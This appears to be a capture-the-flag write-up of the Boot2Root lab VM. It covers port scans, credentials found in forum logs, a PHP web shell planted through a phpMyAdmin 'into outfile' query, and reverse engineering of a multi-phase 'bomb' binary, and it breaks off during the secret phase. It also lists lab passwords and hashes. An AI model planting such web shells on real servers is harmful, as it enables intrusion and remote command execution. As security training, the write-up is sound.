# Boot 2 root ## Finding the server ip ```bash > cat scripts/getIp.sh #!/bin/bash macAddr=$(vboxmanage showvminfo boot2root | grep "NIC 1:" | awk '{print tolower($4)}' | sed 's/.\{2\}/&:/g' | sed 's/.\{2\}$//') echo "mac address: $macAddr" ipAddr=$(nmap -sP 192.168.1.0/24 >/dev/null && arp -an | grep $macAddr | awk '{print $2}' | sed 's/[()]//g') echo "ip address: $ipAddr" > scripts/getIp.sh mac address: 08:00:27:5e:18:ad ip address: 192.168.1.25 ``` ## Search open ports ```bash > nmap 31 192.168.1.25 | grep open 21/tcp open ftp 22/tcp open ssh 80/tcp open http 143/tcp open imap 443/tcp open https 993/tcp open imaps ``` Confirmed by ```bash > sudo nmap -v -sS -A -T4 192.168.1.25 Discovered open port 80/tcp on 192.168.1.25 Discovered open port 443/tcp on 192.168.1.25 Discovered open port 21/tcp on 192.168.1.25 Discovered open port 22/tcp on 192.168.1.25 Discovered open port 993/tcp on 192.168.1.25 Discovered open port 143/tcp on 192.168.1.25 ``` ### More infos on open ports: ```bash > sudo nmap -v -sS -A -T4 192.168.1.25 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later |_ftp-anon: got code 500 "OOPS: vsftpd: refusing to run with writable root inside chroot()". 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 07:bf:02:20:f0:8a:c8:48:1e:fc:41:ae:a4:46:fa:25 (DSA) | 2048 26:dd:80:a3:df:c4:4b:53:1e:53:42:46:ef:6e:30:b2 (RSA) |_ 256 cf:c3:8c:31:d7:47:7c:84:e2:d2:16:31:b2:8e:63:a7 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Hack me if you can 143/tcp open imap Dovecot imapd |_imap-capabilities: STARTTLS OK more have IDLE SASL-IR LOGINDISABLEDA0001 LITERAL+ post-login ENABLE Pre-login listed capabilities IMAP4rev1 ID LOGIN-REFERRALS | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Issuer: commonName=localhost/organizationName=Dovecot mail server | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2015-10-08T20:57:30 | Not valid after: 2025-10-07T20:57:30 | MD5: ea11 cc28 787e 147e a72c 8588 e562 e9b7 |_SHA-1: 2d09 d85f e501 9a67 413e c2d1 6237 11de a91c afbe |_ssl-date: 2020-06-22T15:14:01+00:00; 0s from scanner time. 443/tcp open ssl/http Apache httpd 2.2.22 | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: 404 Not Found | ssl-cert: Subject: commonName=BornToSec | Issuer: commonName=BornToSec | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2015-10-08T00:19:46 | Not valid after: 2025-10-05T00:19:46 | MD5: 3f63 02ca 0bb1 e732 9987 6887 3623 86a3 |_SHA-1: eebc f8de 3422 dd63 5314 9d47 811f f6d1 8f77 c98d |_ssl-date: 2020-06-22T15:14:01+00:00; 0s from scanner time. 993/tcp open ssl/imap Dovecot imapd |_imap-capabilities: CAPABILITY | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Issuer: commonName=localhost/organizationName=Dovecot mail server | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2015-10-08T20:57:30 | Not valid after: 2025-10-07T20:57:30 | MD5: ea11 cc28 787e 147e a72c 8588 e562 e9b7 |_SHA-1: 2d09 d85f e501 9a67 413e c2d1 6237 11de a91c afbe |_ssl-date: 2020-06-22T15:14:01+00:00; 0s from scanner time. MAC Address: 08:00:27:5E:18:AD (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3 OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16 Uptime guess: 0.002 days (since Mon Jun 22 17:11:09 2020) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=261 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ## nmap -A -sC -p- -PN -n -T4 --min-parallelism 128 --min-hostgroup 256 --script "auth,exploit,vuln,http-*" -oA with_scripts 192.168.1.25 ``` 143/tcp open imap Dovecot imapd |_clamav-exec: ERROR: Script execution failed (use -d to debug) | ssl-dh-params: | VULNERABLE: | Diffie-Hellman Key Exchange Insufficient Group Strength | State: VULNERABLE | Transport Layer Security (TLS) services that use Diffie-Hellman groups | of insufficient strength, especially those using one of a few commonly | shared groups, may be susceptible to passive eavesdropping attacks. ``` ``` | http-enum: | /forum/: Forum | /phpmyadmin/: phpMyAdmin | /webmail/src/login.php: squirrelmail version 1.4.22 |_ /webmail/images/sm_logo.png: SquirrelMail ``` ``` |_http-xssed: No previously reported XSS vuln. | ssl-poodle: | VULNERABLE: | SSL POODLE information leak | State: LIKELY VULNERABLE | IDs: BID:70574 CVE:CVE-2014-3566 | The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other | products, uses nondeterministic CBC padding, which makes it easier | for man-in-the-middle attackers to obtain cleartext data via a | padding-oracle attack, aka the "POODLE" issue. ``` --- ## https://192.168.1.25/forum message de lmezard ``` Oct 5 08:45:29 BornToSecHackMe sshd[7547]: Failed password for invalid user !q\]Ej?*5K5cy*AJ from 161.202.39.38 port 57764 ssh2 ``` lmezard: `!q\]Ej?*5K5cy*AJ` laurie@borntosec.net ### laurie webmail https://192.168.1.25/webmail/ laurie@borntosec.net: `!q\]Ej?*5K5cy*AJ` ``` Subject: Very interesting !!!! From: qudevide@mail.borntosec.net Date: Thu, October 8, 2015 11:22 pm To: laurie@borntosec.net ``` ``` Hey Laurie, You cant connect to the databases now. Use root/Fg-'kKXBj87E:aJ$ ``` ### phpmyadmin password root: `Fg-'kKXBj87E:aJ$` | user | pass | mail | | -------- | -------- | -------- | | admin | ed0fd64f25f3bd3a54f8d272ba93b6e76ce7f3d0516d551c28 | admin@borntosec.net | | qudevide | a12e059d6f4c21c6c5586283c8ecb2b65618ed0a0dc1b302a2 | qudevide@borntosec.net | | thor | d30668b779542d60c4cde29e7170148198b1623f4453866797 | thor@borntosec.net | | wandre | f8562b53084d60efa4208fa50d1ef753ef18e089d2dd56c4ed | wandre@borntosec.net | | lmezard | 0171e7dbcbf4bd21a732fa859ea98a2950b4f8aa1e5365dc90 | laurie@borntosec.net | | zaz | f10b3271bf523f12ebd58ef8581c851991bf0d4b4c4bf49d7c | zaz@borntosec.net | 161.202.39.38 invalid user test invalid user admin invalid user PlcmSpIp invalid user ftpuser invalid user pi invalid user nvdb invalid user !q\]Ej?*5K5cy*AJ 11.202.39.38 Invalid user nagios Invalid user adam 104.245.98.119 Invalid user guest Invalid user ubnt Invalid user support Invalid user test Invalid user user Invalid user admin Invalid user PlcmSpIp invalid user ftpuser invalid user pi Invalid user nagios invalid user naos invalid user adm Oct 5 14:54:17 BornToSecHackMe sudo: pam_unix(sudo:session): session opened for user root by admin(uid=1000) Oct 5 14:54:18 BornToSecHackMe sudo: pam_unix(sudo:session): session closed for user root Oct 5 14:54:29 BornToSecHackMe sudo: admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/bin/sh Oct 5 14:57:02 BornToSecHackMe CRON[24211]: pam_unix(cron:session): session opened for user root by (uid=0) Oct 5 14:57:02 BornToSecHackMe CRON[24211]: pam_unix(cron:session): session closed for user root Oct 5 14:57:56 BornToSecHackMe sudo: root : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/sbin/service vsftpd restart ``` Oct 5 14:54:29 BornToSecHackMe sudo: admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/bin/sh ``` ``` sudo: root : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/sbin/service vsftpd restart ``` --- ## Versions *Linux* ``` Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3 OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16 ``` *MySQL* ``` Server: Localhost via UNIX socket Server version: 5.5.44-0ubuntu0.12.04.1 Protocol version: 10 User: root@localhost MySQL charset: UTF-8 Unicode (utf8) ``` *Web server* ``` Apache/2.2.22 (Ubuntu) MySQL client version: 5.5.44 PHP extension: mysqli Documentation ``` *phpMyAdmin* ``` Version information: 3.4.10.1deb1 Documentation Wiki Official Homepage Contribute Get support List of changes ``` *SquirrelMail* ``` SquirrelMail version 1.4.22 ``` *MyLittleForum* ``` Current version: 2.3.4 ``` ## mdp *my little forum* `lmezard`: `!q\]Ej?*5K5cy*AJ` on peux mettre le même mot de passe aux autres comptes grâce a phpMyAdmin *SquirrelMail* `laurie@borntosec.net`: `!q\]Ej?*5K5cy*AJ` *phpMyAdmin* `root`: `Fg-'kKXBj87E:aJ$` ## phpmyadmin shell backdoor Stack php, apache, mysql (LAMP) So the forum are certainly stored into `/var/www/` Let's try `/var/www/forum` phpmyadmin shell backdoor > https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/ ### Let's find a writable directory Clone https://github.com/ilosuna/mylittleforum ```bash > git checkout v2.3.4 > ls -l total 108 drwxr-xr-x 2 zer0nim zer0nim 4096 juin 29 15:28 backup -rw-r--r-- 1 zer0nim zer0nim 15554 juin 29 15:28 CHANGELOG drwxr-xr-x 2 zer0nim zer0nim 4096 juin 29 15:28 config drwxr-xr-x 5 zer0nim zer0nim 4096 juin 29 15:28 images drwxr-xr-x 3 zer0nim zer0nim 4096 juin 29 15:28 includes -rw-r--r-- 1 zer0nim zer0nim 7757 juin 29 15:28 index.php drwxr-xr-x 2 zer0nim zer0nim 4096 juin 29 15:28 install drwxr-xr-x 2 zer0nim zer0nim 4096 juin 29 15:28 js drwxr-xr-x 2 zer0nim zer0nim 4096 juin 29 15:28 lang -rw-r--r-- 1 zer0nim zer0nim 33093 juin 29 15:28 LICENSE drwxr-xr-x 8 zer0nim zer0nim 4096 juin 29 15:28 modules -rw-r--r-- 1 zer0nim zer0nim 730 juin 29 15:28 README drwxr-xr-x 2 zer0nim zer0nim 4096 juin 29 15:28 templates_c drwxr-xr-x 3 zer0nim zer0nim 4096 juin 29 15:28 themes drwxr-xr-x 2 zer0nim zer0nim 4096 juin 29 15:28 update ``` > backup, config, images, includes, install, js, lang, modules, templates_c, themes, update #### test `backup` folder We can remove the `.htaccess` file from the backup folder of the forum with: 1: Change the forum admin password. 2: Connect to it. 3: type ``` https://192.168.1.25/forum/index.php?mode=admin&delete_backup_files[]=.htaccess&delete_backup_files_confirm="OK - Delete" ``` Now we can access to `https://192.168.1.25/forum/backup/` In phpmyadmin folder ```sql SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/backup/backdoor.php" ``` > #1 - Can't create/write to file '/var/www/forum/backup/backdoor.php' (Errcode: 13) #### test `config` folder ```sql SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/config/backdoor.php" ``` > #1 - Can't create/write to file '/var/www/forum/config/backdoor.php' (Errcode: 13) #### test `images` folder ```sql SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/images/backdoor.php" ``` > #1 - Can't create/write to file '/var/www/forum/images/backdoor.php' (Errcode: 13) #### test `includes` folder ```sql SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/includes/backdoor.php" ``` > #1 - Can't create/write to file '/var/www/forum/includes/backdoor.php' (Errcode: 13) #### test `install` folder ```sql SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/install/backdoor.php" ``` > #1 - Can't create/write to file '/var/www/forum/install/backdoor.php' (Errcode: 2) #### test `js` folder ```sql SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/js/backdoor.php" ``` > #1 - Can't create/write to file '/var/www/forum/js/backdoor.php' (Errcode: 13) #### test `lang` folder ```sql SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/lang/backdoor.php" ``` > #1 - Can't create/write to file '/var/www/forum/lang/backdoor.php' (Errcode: 13) #### test `modules` folder ```sql SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/modules/backdoor.php" ``` > #1 - Can't create/write to file '/var/www/forum/modules/backdoor.php' (Errcode: 13) #### test `themes` folder ```sql SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/themes/backdoor.php" ``` > #1 - Can't create/write to file '/var/www/forum/themes/backdoor.php' (Errcode: 13) #### test `update` folder ```sql SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/update/backdoor.php" ``` > #1 - Can't create/write to file '/var/www/forum/update/backdoor.php' (Errcode: 13) #### test `templates_c` folder ```sql SELECT "<?php system($_GET['cmd']) ?>" into outfile "/var/www/forum/templates_c/backdoor.php" ``` > Your SQL query has been executed successfully ( Query took 0.0002 sec ) It worked 🎉 ## Using the backdoor ``` https://192.168.1.25/forum/templates_c/backdoor.php?cmd=whoami www-data ``` ``` https://192.168.1.25/forum/templates_c/backdoor.php?cmd=ls%20/home/ LOOKATME ft_root laurie laurie@borntosec.net lmezard thor zaz ``` ``` https://192.168.1.25/forum/templates_c/backdoor.php?cmd=ls%20/home/ LOOKATME ft_root laurie laurie@borntosec.net lmezard thor zaz https://192.168.1.25/forum/templates_c/backdoor.php?cmd=ls%20/home/LOOKATME password https://192.168.1.25/forum/templates_c/backdoor.php?cmd=cat%20/home/LOOKATME/password lmezard:G!@M6f4Eatau{sF" ``` `lmezard`: `G!@M6f4Eatau{sF"` ### Trying ssh ssh lmezard@192.168.1.25 ____ _______ _____ | _ \ |__ __| / ____| | |_) | ___ _ __ _ __ | | ___| (___ ___ ___ | _ < / _ \| '__| '_ \| |/ _ \\___ \ / _ \/ __| | |_) | (_) | | | | | | | (_) |___) | __/ (__ |____/ \___/|_| |_| |_|_|\___/_____/ \___|\___| Good luck & Have fun lmezard@192.168.1.25's password: Permission denied, please try again. ### Nop, let's try ftp ftp://192.168.1.25/ `lmezard`: `G!@M6f4Eatau{sF"` ``` Index of / Name Size Date Modified README 96 B 10/15/15, 2:00:00 AM fun 790 kB 10/8/15, 2:00:00 AM ``` README: ``` Complete this little challenge and use the result as password for user 'laurie' to login in ssh ``` ## `"fun"` chalenge ```bash > tar -xf fun > ls ft_fun 00M73.pcap 20L0Z.pcap 3W4T7.pcap 5TE6W.pcap 7TNZF.pcap 9NR0E.pcap ... ``` Let's write a function to print all pcap files sorted by page number: ```python= import os, re all_files = {} all_files_sorted = ['' for i in range(755)] for root, dirs, files in os.walk('ft_fun'): for file in files: all_files[file] = open("ft_fun/" + file).read() index = all_files[file].find("file") if index >= 0: # retrieve page number str = all_files[file][index+4:][:15] numPage = [int(s) for s in re.findall(r'\b\d+\b', str)][0] # save value in array at page index all_files_sorted[numPage] = all_files[file] i = 0 for val in all_files_sorted: print("\n--", i, "------------------------------------------------------------------") print(val) i+=1 ``` We can see, `return` instruction after each `getmeX()` declaration, this is probably the content of each functions ```bash > python3 print_sorted.py ``` ``` -- 5 ------------------------------------------------------------------ char getme1() { //file5 -- 6 ------------------------------------------------------------------ return 'I'; //file6 ``` ``` -- 37 ------------------------------------------------------------------ char getme2() { //file37 -- 38 ------------------------------------------------------------------ return 'h'; //file38 ``` ``` -- 56 ------------------------------------------------------------------ char getme3() { //file56 -- 57 ------------------------------------------------------------------ return 'e'; //file57 ``` ``` -- 115 ------------------------------------------------------------------ char getme4() { //file115 -- 116 ------------------------------------------------------------------ return 'a'; //file116 ``` ``` -- 368 ------------------------------------------------------------------ char getme5() { //file368 -- 369 ------------------------------------------------------------------ return 'r'; //file369 ``` ``` -- 521 ------------------------------------------------------------------ char getme6() { //file521 -- 522 ------------------------------------------------------------------ return 't'; //file522 ``` ``` -- 736 ------------------------------------------------------------------ char getme7() { //file736 -- 737 ------------------------------------------------------------------ return 'p'; //file737 ``` ```c char getme1() { return 'I'; } char getme2() { return 'h'; } char getme3() { return 'e'; } char getme4() { return 'a'; } char getme5() { return 'r'; } char getme6() { return 't'; } char getme7() { return 'p'; } char getme8() { return 'w'; } char getme9() { return 'n'; } char getme10() { return 'a'; } char getme11() { return 'g'; } char getme12() { return 'e'; } int main() { printf("M"); printf("Y"); printf(" "); printf("P"); printf("A"); printf("S"); printf("S"); printf("W"); printf("O"); printf("R"); printf("D"); printf(" "); printf("I"); printf("S"); printf(":"); printf(" "); printf("%c",getme1()); printf("%c",getme2()); printf("%c",getme3()); printf("%c",getme4()); printf("%c",getme5()); printf("%c",getme6()); printf("%c",getme7()); printf("%c",getme8()); printf("%c",getme9()); printf("%c",getme10()); printf("%c",getme11()); printf("%c",getme12()); printf("\n"); printf("Now SHA-256 it and submit"); } ``` `laurie`: `sha256(Iheartpwnage)` `laurie`: `330b845f32185747e4f8ca15d40ca59796035c89ea809fb5d30f4da83ecf45a4` ## Laurie' bomb challenge ```bash > ssh laurie@192.168.1.25 laurie@192.168.1.25's password: 330b845f32185747e4f8ca15d40ca59796035c89ea809fb5d30f4da83ecf45a4 laurie@BornToSecHackMe:~$ ls README bomb laurie@BornToSecHackMe:~$ cat README Diffuse this bomb! When you have all the password use it as "thor" user with ssh. HINT: P 2 b o 4 NO SPACE IN THE PASSWORD (password is case sensitive). ``` ```bash > ./bomb Welcome this is my little bomb !!!! You have 6 stages with only one life good luck !! Have a nice day! hey BOOM!!! The bomb has blown up. ``` ```bash > gdb ./bomb > i functions 0x08048b20 phase_1 0x08048b48 phase_2 0x08048b98 phase_3 0x08048ca0 func4 0x08048ce0 phase_4 0x08048d2c phase_5 0x08048d98 phase_6 0x08048e94 fun7 0x08048ee8 secret_phase 0x08048f50 sig_handler 0x08048fb4 invalid_phase 0x08048fd8 read_six_numbers 0x08049018 string_length 0x08049030 strings_not_equal 0x0804908c open_clientfd 0x08049160 initialize_bomb 0x0804917c blank_line 0x080491b0 skip 0x080491fc read_line 0x080492c0 send_msg 0x080494fc explode_bomb 0x0804952c phase_defused 0x80489b0 main ``` main disasembly translated ```c #include <stdio.h> #include <stdlib.h> FILE *infile; void phase_1(char *str) { if (strings_not_equal(str, "Public speaking is very easy.")) { explode_bomb(); } } void sig_handler() { printf("So you think you can stop the bomb with ctrl-c, do you?\n"); sleep(3); printf("Well..."); fflush(stdout); sleep(1); printf("OK. :-)\n"); exit(16); } void initialize_bomb() { // call sig_handler on ctrl+c signal(2, sig_handler) } int main(int ac, char **av) { if (ac == 1) { infile = stdin; } else if (ac == 2) { infile = fopen(av[1], "r"); if (infile == 0) { printf("%s: Error: Couldn't open %s\n", av[0], av[1]) exit(8); } } else { printf("Usage: %s [<input_file>]\n", av[0]) exit(8); } initialize_bomb(); printf("Welcome this is my little bomb !!!! You have 6 stages with\n"); printf("only one life good luck !! Have a nice day!\n"); char *input; input = read_line(); phase_1(input); phase_defused(); printf("Phase 1 defused. How about the next one?\n"); input = read_line(); phase_2(input); phase_defused(); printf("That's number 2. Keep going!\n"); input = read_line(); phase_3(input); phase_defused(); printf("Halfway there!\n"); input = read_line(); phase_4(input); phase_defused(); printf("So you got that one. Try this one.\n"); input = read_line(); phase_5(input); phase_defused(); printf("Good work! On to the next...\n"); input = read_line(); phase_6(input); phase_defused(); return 0; } ``` #### Phase 2 ```c void read_six_numbers(char *param_1,int param_2) { int iVar1; iVar1 = sscanf(param_1,"%d %d %d %d %d %d",param_2,param_2 + 4,param_2 + 8,param_2 + 0xc, param_2 + 0x10,param_2 + 0x14); if (iVar1 < 6) { explode_bomb(); } return; } void phase_2(char *param_1) { int iVar1; int aiStack32 [7]; read_six_numbers(param_1,(int)(aiStack32 + 1)); if (aiStack32[1] != 1) { explode_bomb(); } iVar1 = 1; do { if (aiStack32[iVar1 + 1] != (iVar1 + 1) * aiStack32[iVar1]) { explode_bomb(); } iVar1 = iVar1 + 1; } while (iVar1 < 6); return; } ``` ```text aiStack32[1] = 1 aiStack32[2] = (1 + 1) * 1 = 2 aiStack32[3] = (2 + 1) * 2 = 6 aiStack32[4] = (3 + 1) * 6 = 24 aiStack32[5] = (4 + 1) * 24 = 120 aiStack32[6] = (5 + 1) * 120 = 720 ``` ```bash laurie@BornToSecHackMe:~$ cat /tmp/tmp.8HZU7UDMYA Public speaking is very easy. 1 2 6 24 120 720 laurie@BornToSecHackMe:~$ ./bomb /tmp/tmp.8HZU7UDMYA Welcome this is my little bomb !!!! You have 6 stages with only one life good luck !! Have a nice day! Phase 1 defused. How about the next one? That's number 2. Keep going! ^CSo you think you can stop the bomb with ctrl-c, do you? ^[[A^CWell...OK. :-) ``` #### Phase 3 ```c void phase_3(char *param_1) { int iVar1; char cVar2; uint local_10; char local_9; int local_8; iVar1 = sscanf(param_1,"%d %c %d",&local_10,&local_9,&local_8); if (iVar1 < 3) { explode_bomb(); } switch(local_10) { case 0: cVar2 = 'q'; if (local_8 != 0x309) { explode_bomb(); } break; case 1: cVar2 = 'b'; if (local_8 != 0xd6) { explode_bomb(); } break; case 2: cVar2 = 'b'; if (local_8 != 0x2f3) { explode_bomb(); } break; case 3: cVar2 = 'k'; if (local_8 != 0xfb) { explode_bomb(); } break; case 4: cVar2 = 'o'; if (local_8 != 0xa0) { explode_bomb(); } break; case 5: cVar2 = 't'; if (local_8 != 0x1ca) { explode_bomb(); } break; case 6: cVar2 = 'v'; if (local_8 != 0x30c) { explode_bomb(); } break; case 7: cVar2 = 'b'; if (local_8 != 0x20c) { explode_bomb(); } break; default: cVar2 = 'x'; explode_bomb(); } if (cVar2 != local_9) { explode_bomb(); } return; } ``` We can put differents strings to pass the test ("0 q 777" work for example) but because the "README" file say the second char is `b` the password we want is `1 b 214` ```bash laurie@BornToSecHackMe:~$ cat /tmp/tmp.8HZU7UDMYA Public speaking is very easy. 1 2 6 24 120 720 1 b 214 laurie@BornToSecHackMe:~$ ./bomb /tmp/tmp.8HZU7UDMYA Welcome this is my little bomb !!!! You have 6 stages with only one life good luck !! Have a nice day! Phase 1 defused. How about the next one? That's number 2. Keep going! Halfway there! ``` #### Phase 4 ```c int func4(nb) { if (nb == 1) { return 1; } return func4(nb - 1) + func4(nb - 2); } void phase_4(char *str) { int nb; sscanf(str, "%d", &nb); if (nb != 1) { explode_bomb(); } else if (nb < 0) { explode_bomb(); } if (func4(nb) != 55) { explode_bomb(); } } ``` `func4` est une fonction suite de Fibonacci, le programme attend de recevoir en retour 55, il suffit donc de lui envoyer 9. ```bash laurie@BornToSecHackMe:~$ cat /tmp/tmp.8HZU7UDMYA Public speaking is very easy. 1 2 6 24 120 720 1 b 214 9 ./bomb test Welcome this is my little bomb !!!! You have 6 stages with only one life good luck !! Have a nice day! Phase 1 defused. How about the next one? That's number 2. Keep going! Halfway there! So you got that one. Try this one. ``` #### Phase 5 ```asm array.123 0804b220 69 ; i 0804b221 73 ; s 0804b222 72 ; r 0804b223 76 ; v 0804b224 65 ; e 0804b225 61 ; a 0804b226 77 ; w 0804b227 68 ; h 0804b228 6f ; o 0804b229 62 ; b 0804b22a 70 ; p 0804b22b 6e ; n 0804b22c 75 ; u 0804b22d 74 ; t 0804b22e 66 ; f 0804b22f 67 ; g ``` ```c void phase_5(char *param_1) { int i; char str[6]; undefined local_6; i = string_length(param_1); if (i != 6) { explode_bomb(); } i = 0; do { str[i] = (&array.123)[(char)(param_1[i] & 0xf)]; i = i + 1; } while (i < 6); local_6 = 0; i = strings_not_equal(str, "giants"); if (i != 0) { explode_bomb(); } } ``` On peux voir que la string envoyée a la fonction va determiner la string `local_c` en utilisant les characteres de la chaine envoyé & 0xf comme index de la string `array.123 = "isrveawhobpnutfg"` On a donc juste a envoyé des bytes finissants par l'index que l'on veux en évitant d'envoyer `\x00` pour l'index 0 car la fonction `string_length` s'arreterait, iVar1 serait different de 6 et la fonction passerais par `explode_bomb()` dans notre cas on veux que la chaine finale soit egale a `giants`, on peux donc envoyer ceci: ``` 15 0 5 11 13 1 g i a n t s ``` ``` 15 1111 0 0000 5 0101 11 1011 13 1101 1 0001 ``` We need ascii code that end with this 4 bytes. ``` o 0110 1111 p 0111 0000 e 0110 0101 or u 0111 0101 k 0110 1011 m 0110 1101 a 0110 0001 or q 0111 0001 ``` so we can enter `opekma`, `opukma`, `opukmq` or `opekmq` #### Phase 6 ```c++ #include <stdio.h> #include <stdlib.h> #include <unistd.h> int *node1 = { 253, 1, 134525500 }; int *node2 = { 725, 2, 134525488 }; int *node3 = { 301, 3, 134525548 }; int *node4 = { 997, 4, 134525536 }; int *node5 = { 212, 5, 0 }; int *node6 = { 432, 6, 134525524 }; void phase_6(char *input_strings) { unsigned i, j; int nbs[6]; read_six_numbers(input_strings, nbs); i = 0; do { if (nbs[i] - 1 > 5) explode_bomb(); j = i + 1; while (j < 6) { if (nbs[i] == nbs[j]) explode_bomb(); ++j; } ++i; } while (i < 6); int *nodePtr1; int *nodePtr2; int *nbs2[6]; i = 0; do { j = 1; nodePtr1 = node1; if (nbs[i] >= 1) { do { nodePtr1 = nodePtr1[2]; ++j; } while (j < nbs[i]); } nbs2[i] = nodePtr1; ++i; } while (i < 6); i = 1; nodePtr1 = nbs2[0]; do { nodePtr2 = nbs2[i]; *(int **)(nodePtr1 + 2) = nodePtr2; ++i; nodePtr1 = nodePtr2; } while (i < 6); nodePtr2[2] = 0; i = 0; do { if (*nbs2[0] < *(int *)nbs2[0][2]) { explode_bomb(); } nbs2[0] = (int *)nbs2[0][2]; ++i; } while (i < 5); } ``` La fonction attend de lire 5 nombres en entrée. Le premier do while force les nombres a être compris entre `1 et 6` et a être tous different. En fonction du chiffre rentrée le programe va stocker la valeur de la node correspondante dans un tableau de 6 nombres: pour `1`: `node1`, pour `2`: `node2`, etc ``` nbs2[0] = node{nbs[0]} nbs2[1] = node{nbs[1]} ... nbs2[5] = node{nbs[1]} ``` La derniere boucle vas verifier que le tableau `nbs2` est trié dans le sens décroissant sinon elle fait exploser la bombe. On peu recuperer les valeurs des nodes comme ceci: ``` (gdb) x/3d &node1 0x804b26c <node1>: 253 1 134525500 (gdb) x/3d &node2 0x804b260 <node2>: 725 2 134525488 (gdb) x/3d &node3 0x804b254 <node3>: 301 3 134525548 (gdb) x/3d &node4 0x804b248 <node4>: 997 4 134525536 (gdb) x/3d &node5 0x804b23c <node5>: 212 5 0 (gdb) x/3d &node6 0x804b230 <node6>: 432 6 134525524 ``` Il suffit donc de donner les 6 indexes de nodes de façon ordonée. ``` 4: 0x804b248 <node4>: 997 2: 0x804b260 <node2>: 725 6: 0x804b230 <node6>: 432 3: 0x804b254 <node3>: 301 1: 0x804b26c <node1>: 253 5: 0x804b23c <node5>: 212 ``` donc: `4 2 6 3 1 5` ```bash $> vim test 1 Public speaking is very easy. 2 1 2 6 24 120 720 3 1 b 214 4 9 5 opekma 6 4 2 6 3 1 5 $> ./bomb test Welcome this is my little bomb !!!! You have 6 stages with only one life good luck !! Have a nice day! Phase 1 defused. How about the next one? That's number 2. Keep going! Halfway there! So you got that one. Try this one. Good work! On to the next... Congratulations! You've defused the bomb! ``` b *main+346 #### Enter secret phase ```c void phase_defused(void) { int iVar1; undefined local_58[4]; char *secretStr[80]; if (num_input_strings == 6) { iVar1 = sscanf(input_strings + 0xf0, "%d %s", local_58, secretStr); if (iVar1 == 2) { iVar1 = strings_not_equal(secretStr,"austinpowers"); if (iVar1 == 0) { printf("Curses, you\'ve found the secret phase!\n"); printf("But finding it and solving it are quite different...\n"); secret_phase(); } } printf("Congratulations! You\'ve defused the bomb!\n"); } return; } ``` ``` iVar1 = sscanf(input_strings + 0xf0, "%d %s", local_58, secretStr); if (iVar1 == 2) { iVar1 = strings_not_equal(secretStr,"austinpowers"); ... ``` `input_strings + 0xf0` = "9" So if we put "austinpowers" after the input 9 of the phase 4 we can enter the secret phase ```bash $> vim test 1 Public speaking is very easy. 2 1 2 6 24 120 720 3 1 b 214 4 9 austinpowers 5 opekma 6 4 2 6 3 1 5 $> ./bomb test Welcome this is my little bomb !!!! You have 6 stages with only one life good luck !! Have a nice day! Phase 1 defused. How about the next one? That's number 2. Keep going! Halfway there! So you got that one. Try this one. Good work! On to the next... Curses, you've found the secret phase! But finding it and solving it are quite different... ``` #### Solving secret phase ```c int *n1 = { 36, 134525716, 134525704, 0, 0, 0, 0, 0 }; int fun7(int *param_1, int param_2) { if (param_1 == NULL) { return -1; } int res; if (param_2 < *param_1) { res = fun7(param_1[1], param_2); res = res * 2; } else { if (param_2 == *param_1) { res = 0; } else { res = fun7(param_1[2], param_2); res = res * 2 + 1; } } return res; } void secret_phase(void) { char *str; int nb; str = read_line(); nb = __strtol_internal(str, 0, 10, 0); if (nb - 1 > 1000) { explode_bomb(); } nb = fun7(n1, nb); if (nb != 7) { explode_bomb(); } printf("Wow! You\'ve defused the secret stage!\n"); phase_defused(); } ``` `long int strtol (const char* str, char** endptr, int base);` Parses the C-string str interpreting its content as an integral number of the specified base >`str` C-string beginning with the representation of an integral number. `endptr` Reference to an object of type char*, whose value is set by the function to the next character in str after the numerical value. This parameter can also be a null pointer, in which case it is not used. `base` Numerical base (radix) that determines the valid characters and their interpretation. If this is 0, the base used is determined by the format in the sequence (see above). --- The input number need to be `<= 1001` and `fun7(n1, nb) == 7` We want fun7 to return 7. We can archive this by entering 3 times `res = res * 2 + 1;` ``` 0 * 2 + 1 1 1 * 2 + 1 3 3 * 2 + 1 7 ``` --- ##### 1st recursion int *n1 = { 36, 134525716, 134525704, 0, 0, 0, 0, 0 }; n1[2]: ``` x/4d 134525704 int *n22 = { 50, 134525680, 134525656, 8 } ``` ##### 2nd recursion n22[2]: ``` x/4d 